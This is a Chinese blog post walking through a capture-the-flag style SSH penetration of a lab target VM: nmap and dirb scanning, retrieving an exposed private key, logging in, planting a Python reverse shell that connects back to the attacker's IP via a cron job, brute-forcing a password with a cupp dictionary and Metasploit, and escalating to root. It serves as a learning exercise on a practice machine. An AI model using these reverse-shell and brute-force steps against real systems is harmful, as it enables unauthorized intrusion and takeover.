我要偷偷的学渗透,然后惊讶所有人(ssh服务渗透)

最新推荐文章于 2024-06-04 11:29:51 发布
最新推荐文章于 2024-06-04 11:29:51 发布
阅读量4.7k 收藏 5
点赞数
分类专栏: 个人笔记 文章标签: ssh 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20765511/article/details/123218572
版权

准备需要的靶机

这次也是ssh服务的靶机,有需要或者感兴趣的家人们可以私信我,放心没有什么广告收费什么的,都是免费的

kali IP 192.168.43.105
靶机 IP:192.168.43.59

我之前的文章有怎么教获取靶机的IP

渗透第一步,先扫描信息

这里使用 nmap -sV IP 开放的服务和服务信息
nmap -sV 192.168.43.59

在这里插入图片描述这里开放了三个端口,其中有80端口,可以去看看网址上有什么信息

在这里插入图片描述这里可以看到这可能是用户名,可以先记着
随后在来深入的扫描一下

dirb http:IP
我这里是 dirb http://192.168.43.59

得到了这么一堆东西
在这里插入图片描述这里只有上面的是有用的,下面打开都是这个用的是什么服务

这时候就要去找找这里面有什么信息了
第一个是在这里插入图片描述在这里插入图片描述这里点一下又变回去原来 界面了

第二个:在这里插入图片描述
可以看到这里有一个txt的文本文件点开看看
在这里插入图片描述可以看到这是一个rsa文本文件,把它下载下来

wget 文件路径
我这里是 wget http://192.168.43.59/icons/VDSoyuAXiO.txt
下载好了之后为了好记点给它命名为id_rsa

命令 :mv 要从命名的文件 要命名的名字

然后就是给这个文件权限

chmod 600 文件名
我这里是 chmod 600 id_rsa

这里拿到了私钥,并且前面记下来的一个用户名
那就满足了ssh登入

命令: ssh -i 私钥名 用户名@IP
我这里是 ssh -i id_rsa martin@192.168.43.59

在这里插入图片描述发现这里并没有设密码,随便就进来了,接下来就是提权了

pwd:查看当前路径

在这里插入图片描述可以看到这个用户下并没有文件,那可以去看看有没有什么执行文件之类的,比如:/etc/crontab 文件,这是设定系统定期执行的任务,如果有除root以外的用户定制了这个任务,却没有这个文件,那可以上传一个反弹shell

cat /etc/crontab

在这里插入图片描述可以看到,这里有个出root以外的执行文件,可以上传试试看,一般来说在liunx里,这个定时文件都是在tmp文件夹里,所以进入到这个文件夹里

在这里插入图片描述可以看到这里是没有文件的,都是一些隐藏的文件,这时候就可以上传个反弹shell了

在这里插入图片描述`#!/usr/bin/python
import os,subprocess,socket

s.= socket.socket()
s.connect((“192.168.43.105”,“4444”)) #这里是自己的攻击机IP和自己设置的端口
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])

第一行是导入需要的模块
第二行是 攻击机的IP和监听地址
第三到第五行都是怕打错而设置的
第六行调用shell的交互模式

攻击机netcat 命令
nc -lpv 未占用端口 和上面反弹shell设置的端口要一样

查看占用端口 netstat -pantu

在这里插入图片描述开启监听之后就是这样
回到tmp文件,把文件名改成执行的文件名
mv 需要改名的文件 要改的名字

我这里就是mv 1.py sekurity.py
在这里插入图片描述在这里插入图片描述
等了好一会都没有反应,那就先挂在这,等它有结果来,这时候就找找看,能不能暴力破解

今天用到的是cupp创建字典,但是kali里没有,得自己下才行
命令如下

git clone https://github.com/jeanphorn/common-password.git
chmod +x cupp.py #赋权(可执行权限)
./cupp.py -i #以交互的方式创建字典

在这里插入图片描述这样就下载好了

在这里插入图片描述

创建的时候开头的name是你要创建文件的名字,最后面的是让你选择

你想添加一些关于受害者的关键词吗?Y/[N]:
你想在单词的末尾加上特殊的字符吗?Y/[N]:
你想在单词的末尾加上一些随机数吗?Y/[N]
Leet模式?(即leet=1337)Y/[N]:

这个看个人需求,反正我就选了第三个,如果都不需要就一直回车就好了,然后字典就创建好了

在这里使用metasploit破解SSH
在终端中输入
msfconsole

use auxiliary/scanner.ssh.ssh_login
show options #查看当前配置
set rhosts 192.169.43.59 #远程访问的主机
set username hadi #注意我这里的haid是用户名
set pass_file /home/kali/桌面/common-password/hadi.txt #这里是你的文件路径
set threads 5
set verbose true #设置为true 每一条信息都返回
run

这里不知道路径可以点开文件夹直接看到
在这里插入图片描述
在这里插入图片描述run 运行之后就开始暴力破解了

等它这样破解的有点满,要等一下
在这里插入图片描述
在这里可以看到密码是 hadi123
然后

set password hadi123 #修改密码
sessions -i 1 #连接hadi

在这里插入图片描述
可以看到,已经进来了,为了方便操作,把它优化一下

python -c “import pty;pty.spawn(’/bin/bash’)”

在这里插入图片描述
出现了熟悉的界面

su root
输入刚才得到的密码

在这里插入图片描述
可以看到,已经得到了root权限,接下来就是找到flag就ok了
一般来说都是在root目录下
在这里插入图片描述
就得到了flag

总结:在ssh服务渗透中,大部分情况是利用获取到的私钥文件,直接使用用户名和私钥文件登入靶场机器,个别情况进行暴力破解获取用户密码,用过用户名和对应的用户登录靶场机器

CTF中 /tmp 数据缓冲目录
/etc/crontab 设置定时执行的文件

温馨提示:以上代码最好自己过两遍,出发能看一眼就记住

泣血花
关注
专栏目录
一张图告诉你,如何渗入企业内网
07-10 2万+
渗入企业内网,成功获得起始攻击点,这就是一个很有意思的话题,因为有各种有趣的攻击方式。对攻击者来说,攻击是一种成本,选择一条成功率高的攻击路径尤为重要,这个路径就是一种攻击策略。而对于防...
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
最新发布
杨秀璋的专栏
07-14 682
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同有帮助。
ssh--渗透
qq_49694748的博客
01-09 2424
SSH 为 Secure Shell的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议 从客户端来看,SSH提供两种级别的安全验证 第一种级别(基于口令的安全验证) 第二种级别(基于密匙的安全验证) SSH配置文件位置:/etc/ssh/sshd_config SSH对应服务名称:sshd .ssh目录存在于用户的根目录 1、 sshsshd的区别 2、 ssh常用配置参数 3、 信息收集-nmap 4、 ss.
CTF-6.SSH服务渗透
woo233的博客
09-12 1359
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF中要特别注意。
渗透测试笔记】之【内网渗透——应用层隧道(SSH隧道的使用:本地、远程端口转发(1)
2401_84970145的博客
05-13 630
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套习资料》,初衷也很简单,就是希望能够帮助到想自提升又不知道该从何起的朋友。既有适合小白习的零基础资料,也有适合3年以上经验的小伙伴深入习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
CTF-SSH 服务渗透综述
su__xiaoyan的博客
12-15 613
SSH协议简介: SSH为Secure Shell的缩写,是建立在应用层基础上的安全协议;SSH是目前较为可靠,专为远程登录会话和其他网络服务提供安全性的协议,利用SSH协议可以有效的防止远程管理过程中的信息泄露问题。 SSH客户端适用于多种平台,几乎所有的UNIX平台都可以运行SSH。基于TCP的22端口。 SSH协议的认证机制: ssh服务以非对称加密的方式实现身份验证 ssh协议的认证机制分为两种形式:基于密码的安全验证 基于秘钥的安全验证 基于密码的安全验证: 客户端发送登录请求 服务
SSH服务渗透
wysw1998的博客
08-03 2446
1.已知攻击靶场的IP //探测靶场开放的服务服务的版本 nmap -sV 靶场IP //探测靶场全部信息 nmap -A -v IP //探测靶场的操作系统类型与版本 nmap -O IP config是配置文件,里面可能有用户名和密码 这是第一次启动metasploit的情形,回车是默认选项 返回每一条登陆信息 开启破解,获得答案hadi123,时间还是...
【VulnHub靶机渗透】二:Lazysysadmin
野原新之助
03-30 1291
该靶机设定了一些不安全的配置以及弱口令,导致重要文件泄漏。本次通过对发现的端口服务,逐一进行渗透提权测试来习该靶机。
渗透理论概述
Auscoo111的博客
10-23 4793
渗透入门——术语概述 常见术语 渗透流程 明确目标——信息收集——漏洞探测——漏洞验证——编写报告 ——信息整理——获取所需——信息分析 脚本:动态网站(asp,php,jsp), linux, python 网站:静态网站(与后台交互比较少,如html) 动态网站(使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台lin...
【教程】深入探讨内网渗透:初识域基础与简单域搭建
2401_85314122的博客
06-04 572
• WCE(Windows凭据管理器)• minikatz(从内存中获取明文密码)• Responder(嗅探网络中所有的LLMNR包,获取主机的信息)• BeEF(一款针对浏览器的渗透测试工具)• DSHashes(从NTDSXtract中提取用户易于理解的散列值)• PowerSploit(一款基于PowerShell的后渗透测试框架)• Nishang(一款针对Powershell的渗透测试工具)• Empire(一款内网渗透测试利器)
CTF-SSH服务渗透
IT小学子的博客
05-02 821
CTF-SSH服务渗透信息探测对于SSH服务的22端口的靶场面对HTTP服务80端口开放的端口或者其他端口的靶场挖掘敏感信息对ssh密钥进行利用查看根目录文件寻找flagshell 监听暴力破解 信息探测 探测靶场开放的服务服务的版本 nmap -sV ip地址 探测靶场全部信息 nmap -A -v IP地址 nmap -v -n -A www.baidu.com 探测靶场的操作系统类型与版...
Born2root-SSH服务渗透
weixin_45007073的博客
01-02 1402
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想习如何使用Mar
SSH服务渗透测试
小锤队长的博客
10-05 3479
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
内网渗透-SSH隧道
weixin_45427778的博客
08-18 524
内网渗透之——ssh隧道 网络拓扑图: ssh 正向链接: 在web服务器执行 ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1 在web服务器做端口映射,将数据服务器的80端口映射到web服务器的7777端口,随后访问192.168.0.144:7777即可访问到数据库的80页面。 反向连接: 将web服务器的22端口转发出去到黑客IP web服务器执行: ssh -qTfnN -R 2222:127.0.0.1 root@192.
CTF2-SSH服务渗透
weixin_52132147的博客
08-06 206
在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。在CTF中要特别注意 /tmp 数据缓冲目录以及 /etc/crontab 设置定时执行的文件。
渗透技巧之ssh
huyangg的专栏
09-21 831
原文地址:http://www.anquan.us/static/drops/tips-1951.html 1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口,然后连
渗透&&探测 (之SSH密码暴破)
weixin_34294649的博客
09-30 939
什么是SSH?   简单说,SSH是一种 网络协议,用于计算机之间的 加密登录。   如果一个用户从本地计算机,使用SSH协议 登录 另一台远程计算机,我们就可以认为,这种登录是 安全 的,即使 被中途截获,密码也 不会泄露。   最早的时候,互联网通信都是 明文通信,一旦被截获,内容就 暴露无疑。1995年,芬兰者Tatu Ylonen设计了SSH协议,将登录信息 全部加密,成为互联网安全的一...
网络安全: Kali Linux 进行 SSH 渗透与防御
cronaldo91的博客
03-06 2168
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本。(1)扫描⽬标主机所在⽹段所有存活的主机。192.168.204.154(动态)(17)SSH安全配置(容错次数)( 14)SSH安全配置(端口)(1)SSH安全配置(端口)(5)进入MSF 控制台。(8)设置用户名与密码本。(16)验证(等待1分钟)(1)进入MSF 控制台。(5)设置用户名与密码本。(10)nmap扫描端口。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值